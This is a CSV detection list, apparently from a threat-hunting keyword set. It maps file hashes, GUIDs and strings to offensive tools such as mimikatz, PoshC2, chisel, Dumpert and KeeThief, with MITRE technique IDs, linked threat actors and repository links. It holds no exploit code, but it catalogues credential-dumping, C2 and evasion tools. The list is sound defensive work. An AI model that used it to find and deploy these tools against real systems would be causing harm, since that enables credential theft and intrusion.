"*c1fb599493390e17676176219c5cdd8f4b4bca43696b6a54ded88c9b28f741ff*",".{0,1000}c1fb599493390e17676176219c5cdd8f4b4bca43696b6a54ded88c9b28f741ff.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","#filehash","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","36764" "*C2 Client*",".{0,1000}C2\sClient.{0,1000}","offensive_tool_keyword","nimplant","A light-weight 
first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","36766" "*C2 Framework for villains*",".{0,1000}C2\sFramework\sfor\svillains.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","36767" "*C2 Nimplant Server*",".{0,1000}C2\sNimplant\sServer.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","36768" "*c2 target,eg 127.0.0.1:64535*",".{0,1000}c2\starget,eg\s127\.0\.0\.1\:64535.{0,1000}","offensive_tool_keyword","C2ReverseProxy","ReverseProxy C2 - Bring CS online without going offline","T1090 - T1090.002 - T1573 - T1573.001 - T1573.002","TA0011","N/A","N/A","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","0","N/A","N/A","10","10","486","56","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z","36769" "*c2.hak5.org*",".{0,1000}c2\.hak5\.org.{0,1000}","offensive_tool_keyword","hak5 cloudc2","Cloud C2 makes it easy for pentesters and security teams to deploy and manage Hak5 gear from the cloud","T1021 - T1102 - T1213","TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://shop.hak5.org/products/c2?","1","1","N/A","N/A","10","9","N/A","N/A","N/A","N/A","36770" 
"*C2.KillDate*",".{0,1000}C2\.KillDate.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","36771" "*c2.striker.*",".{0,1000}c2\.striker\..{0,1000}","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","N/A","10","10","301","42","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z","36772" "*C2.UserAgent*",".{0,1000}C2\.UserAgent.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta 
- APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","36773" "*C2/C2Server.*",".{0,1000}C2\/C2Server\..{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","36774" "*C2_RPC_functions.py*",".{0,1000}C2_RPC_functions\.py.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","N/A","10","10","3586","465","2025-04-16T18:01:45Z","2018-07-05T02:09:59Z","36775" "*c2_server*.py*",".{0,1000}c2_server.{0,1000}\.py.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","36776" "*c2_server.py *",".{0,1000}c2_server\.py\s.{0,1000}","offensive_tool_keyword","Commander","A command and control (C2) server","T1021 - T1027 - T1059","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/voukatas/Commander","1","0","N/A","N/A","10","10","56","16","2024-07-05T11:05:30Z","2023-02-03T16:46:33Z","36777" "*c2_server.resources*",".{0,1000}c2_server\.resources.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework 
designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","N/A","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","36778" "*C2_Server-main*",".{0,1000}C2_Server\-main.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","1","N/A","N/A","10","10","54","18","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z","36779" "*c2_service.sh*",".{0,1000}c2_service\.sh.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","N/A","10","10","3586","465","2025-04-16T18:01:45Z","2018-07-05T02:09:59Z","36780" "*c2016dbd1bce8c6e38097264c6e0f96a55858c57dcee4e9d53be6d1a6e4705c9*",".{0,1000}c2016dbd1bce8c6e38097264c6e0f96a55858c57dcee4e9d53be6d1a6e4705c9.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","36781" "*c209bedad717b0db49a7109c3b4dec90cfad5d58dbfe7e8c32f828c61494bc60*",".{0,1000}c209bedad717b0db49a7109c3b4dec90cfad5d58dbfe7e8c32f828c61494bc60.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - 
TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","36782" "*c2109f44079ae2c753b2f2763562c141d7db57a33649baa7086b204109a98d25*",".{0,1000}c2109f44079ae2c753b2f2763562c141d7db57a33649baa7086b204109a98d25.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","#filehash","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","36785" "*c2268ac17f1df0139ec5aa11da1ae6b8bef2ad3588f31d8e62c85a55cf85b073*",".{0,1000}c2268ac17f1df0139ec5aa11da1ae6b8bef2ad3588f31d8e62c85a55cf85b073.{0,1000}","offensive_tool_keyword","powerview","PowerView.py is an alternative for the awesome original PowerView.ps1","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/aniqfakhrul/powerview.py","1","0","#filehash","N/A","10","7","622","66","2025-04-22T09:01:39Z","2022-06-19T16:13:04Z","36787" "*c235329bd192781dad37dc190bbce353f3f7ade3a98b6d1c79e2ab69a91f26ff*",".{0,1000}c235329bd192781dad37dc190bbce353f3f7ade3a98b6d1c79e2ab69a91f26ff.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","#filehash","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","36788" 
"*c23628bad8bfff013fe5d96f50013c838c5900962550a86521e3063879a1bf9e*",".{0,1000}c23628bad8bfff013fe5d96f50013c838c5900962550a86521e3063879a1bf9e.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","36790" "*C23B51C4-2475-4FC6-9B3A-27D0A2B99B0F*",".{0,1000}C23B51C4\-2475\-4FC6\-9B3A\-27D0A2B99B0F.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","0","#GUIDproject","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","36791" "*c23c160ea84911fa0041045b64551322f282d2d68b5c2689c4bd992c2f7c9267*",".{0,1000}c23c160ea84911fa0041045b64551322f282d2d68b5c2689c4bd992c2f7c9267.{0,1000}","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. 
while not touching disk and evading AV/EDR monitored user-mode API calls.","T1055.011 - T1003 - T1562.001 - T1027","TA0005 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/outflanknl/Dumpert","1","0","#filehash","Dispossessor samples","10","10","1523","246","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z","36792" "*c2494e6e5e6496d3d04fb69927a25c8cead06e68cd2d4005ee4b3853770ece4f*",".{0,1000}c2494e6e5e6496d3d04fb69927a25c8cead06e68cd2d4005ee4b3853770ece4f.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","36793" "*c24e0fea42a4e92ab55ff814ca3c5691a9bd0cdcd923db5ca96862a580757316*",".{0,1000}c24e0fea42a4e92ab55ff814ca3c5691a9bd0cdcd923db5ca96862a580757316.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","36794" "*c254090da39e70c2a20291aee65043f470acc77d7e6dede2ccc4784d75c024c4*",".{0,1000}c254090da39e70c2a20291aee65043f470acc77d7e6dede2ccc4784d75c024c4.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - 
TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","36796" "*c254dc53b3cf9c7d81d92f4e060a5c44a4f51a228049fd1e2d90fafa9c0a44ee*",".{0,1000}c254dc53b3cf9c7d81d92f4e060a5c44a4f51a228049fd1e2d90fafa9c0a44ee.{0,1000}","offensive_tool_keyword","EarthWorm","SOCKS v5 proxy service used for data forwarding in complex network environments","T1090.002 - T1573.001 - T1095","TA0010 - TA0008 - TA0011","N/A","APT27 - APT15 - Calypso - Earth Lusca - Worok","C2","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#filehash","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z","36797" "*c254dc53b3cf9c7d81d92f4e060a5c44a4f51a228049fd1e2d90fafa9c0a44ee*",".{0,1000}c254dc53b3cf9c7d81d92f4e060a5c44a4f51a228049fd1e2d90fafa9c0a44ee.{0,1000}","offensive_tool_keyword","EarthWorm","SOCKS v5 proxy service used for data forwarding in complex network environments","T1090.002 - T1573.001 - T1095","TA0010 - TA0008 - TA0011","N/A","APT27 - APT15 - Calypso - Earth Lusca - Worok","C2","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#filehash","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z","36798" "*c257234e783ab69c48d2d5b9b411edccfe5b0b1d7c2aa96d77c34e095bb88ac9*",".{0,1000}c257234e783ab69c48d2d5b9b411edccfe5b0b1d7c2aa96d77c34e095bb88ac9.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","36799" 
"*c25ff60d4286c239522b0b0292c801a5711ec994fa90429adf7d57ed8735bb07*",".{0,1000}c25ff60d4286c239522b0b0292c801a5711ec994fa90429adf7d57ed8735bb07.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","36802" "*c2635225a206bbd00ab89ef7e8418acdee38e2f2969be43c9d04031f3fbb0e14*",".{0,1000}c2635225a206bbd00ab89ef7e8418acdee38e2f2969be43c9d04031f3fbb0e14.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","36803" 
"*c2635225a206bbd00ab89ef7e8418acdee38e2f2969be43c9d04031f3fbb0e14*",".{0,1000}c2635225a206bbd00ab89ef7e8418acdee38e2f2969be43c9d04031f3fbb0e14.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","36804" "*c2656885d23a89c0ce5ecb131762889fe7c39ff2cf4a8b6d8db2c9d782fb94bd*",".{0,1000}c2656885d23a89c0ce5ecb131762889fe7c39ff2cf4a8b6d8db2c9d782fb94bd.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","36805" 
"*c26e4d825f8e7f7ac40efbebe1302ca8fd4a5b76b3f2969ab5cad764565dfc9c*",".{0,1000}c26e4d825f8e7f7ac40efbebe1302ca8fd4a5b76b3f2969ab5cad764565dfc9c.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","36807" "*c26ec6ee7d0d59e1db1f8934b903bd667901875ce09379e873178f6142bf4cea*",".{0,1000}c26ec6ee7d0d59e1db1f8934b903bd667901875ce09379e873178f6142bf4cea.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","36808" "*c27a1a9ed68825e382cdd8db8da2c5139a431d36c300f95bf8e0e7a04af88b2d*",".{0,1000}c27a1a9ed68825e382cdd8db8da2c5139a431d36c300f95bf8e0e7a04af88b2d.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","36809" "*c27a8cb8c4a97bbd0898799f3449d0f0a659360fc56cb43e0755bfeb25939241*",".{0,1000}c27a8cb8c4a97bbd0898799f3449d0f0a659360fc56cb43e0755bfeb25939241.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. 
Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","#filehash","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","36810" "*c27eaa1709a00ec0c47d47b8c6c061b2f63223d8553fa7d7baa40f7cea903b8f*",".{0,1000}c27eaa1709a00ec0c47d47b8c6c061b2f63223d8553fa7d7baa40f7cea903b8f.{0,1000}","offensive_tool_keyword","dropper","Generates Malicious Office Macro Enabled Dropper for DLL SideLoading and Embed it in Lnk file to bypass MOTW","T1059 - T1574.002 - T1218 - T1559.003","TA0002 - TA0005 - TA0009","N/A","N/A","Resource Development","https://github.com/SaadAhla/dropper","1","0","#filehash","N/A","10","","N/A","","","","36812" "*c288394f0c71cea2f14223899de957ca2a5d101bcbfe1efacc23e480fabde335*",".{0,1000}c288394f0c71cea2f14223899de957ca2a5d101bcbfe1efacc23e480fabde335.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","#filehash","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","36814" "*c28894e4ab24d142a072fdbfddde4dfbfcaba9bfc741a00e935e596ac8c2b3d3*",".{0,1000}c28894e4ab24d142a072fdbfddde4dfbfcaba9bfc741a00e935e596ac8c2b3d3.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","36815" "*c28b90220de9396746da9507ee9e7dce146c67781cd3a176c6394b52655d60d9*",".{0,1000}c28b90220de9396746da9507ee9e7dce146c67781cd3a176c6394b52655d60d9.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - 
TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","36816" "*c2935d032a38a5a6d3251d22b9d93d08223b8dbf90efedbb0e6716cdafe76367*",".{0,1000}c2935d032a38a5a6d3251d22b9d93d08223b8dbf90efedbb0e6716cdafe76367.{0,1000}","offensive_tool_keyword","phishery","Phishery is a Simple SSL Enabled HTTP server with the primary purpose of phishing credentials via Basic Authentication. Phishery also provides the ability easily to inject the URL into a .docx Word document.","T1566.001 - T1071 - T1204.002","TA0001 ","N/A","BERSERK BEAR","Phishing","https://github.com/ryhanson/phishery","1","0","#filehash","N/A","9","10","993","209","2017-09-11T15:42:10Z","2016-09-25T02:19:24Z","36818" "*c299346734b17df1a8dc47d97145c756938307fbd249837ff4dc697befd2961b*",".{0,1000}c299346734b17df1a8dc47d97145c756938307fbd249837ff4dc697befd2961b.{0,1000}","offensive_tool_keyword","MSSprinkler","password spraying utility for organizations to test their M365 accounts from an external perspective. 
It employs a 'low-and-slow' approach","T1110.003 - T1110.001","TA0006 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/TheresAFewConors/MSSprinkler","1","0","#filehash","N/A","9","1","74","7","2025-02-25T13:32:41Z","2024-09-15T09:54:53Z","36819" "*c2a3763c4079c3c9671d1511d6ad8df2b544d0eefbbfd138aa327000a5eb1ec1*",".{0,1000}c2a3763c4079c3c9671d1511d6ad8df2b544d0eefbbfd138aa327000a5eb1ec1.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","36821" "*c2a640190d6567ec2b613cb2f3a37496a4df5450c577e4326b13457f69ba7160*",".{0,1000}c2a640190d6567ec2b613cb2f3a37496a4df5450c577e4326b13457f69ba7160.{0,1000}","offensive_tool_keyword","Luna-Grabber","discord token grabber made in python","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Smug246/Luna-Grabber","1","0","#filehash","N/A","10","","N/A","","","","36822" "*C2ACD3667483E5AC1E423E482DBA462E96DA3978776BFED07D9B436FEE135AB2*",".{0,1000}C2ACD3667483E5AC1E423E482DBA462E96DA3978776BFED07D9B436FEE135AB2.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","#filehash","N/A","9","8","761","129","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z","36823" "*c2be7dd40f08c1696c4971e9adb2ffa6b5d8565199aedd952c5e7238e1ad08f3*",".{0,1000}c2be7dd40f08c1696c4971e9adb2ffa6b5d8565199aedd952c5e7238e1ad08f3.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous 
webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","36825" "*c2c3bd47f27bb46be73e9ac8aff49dc36d6baea77ac7998d3668aef1b4893f85*",".{0,1000}c2c3bd47f27bb46be73e9ac8aff49dc36d6baea77ac7998d3668aef1b4893f85.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","36826" 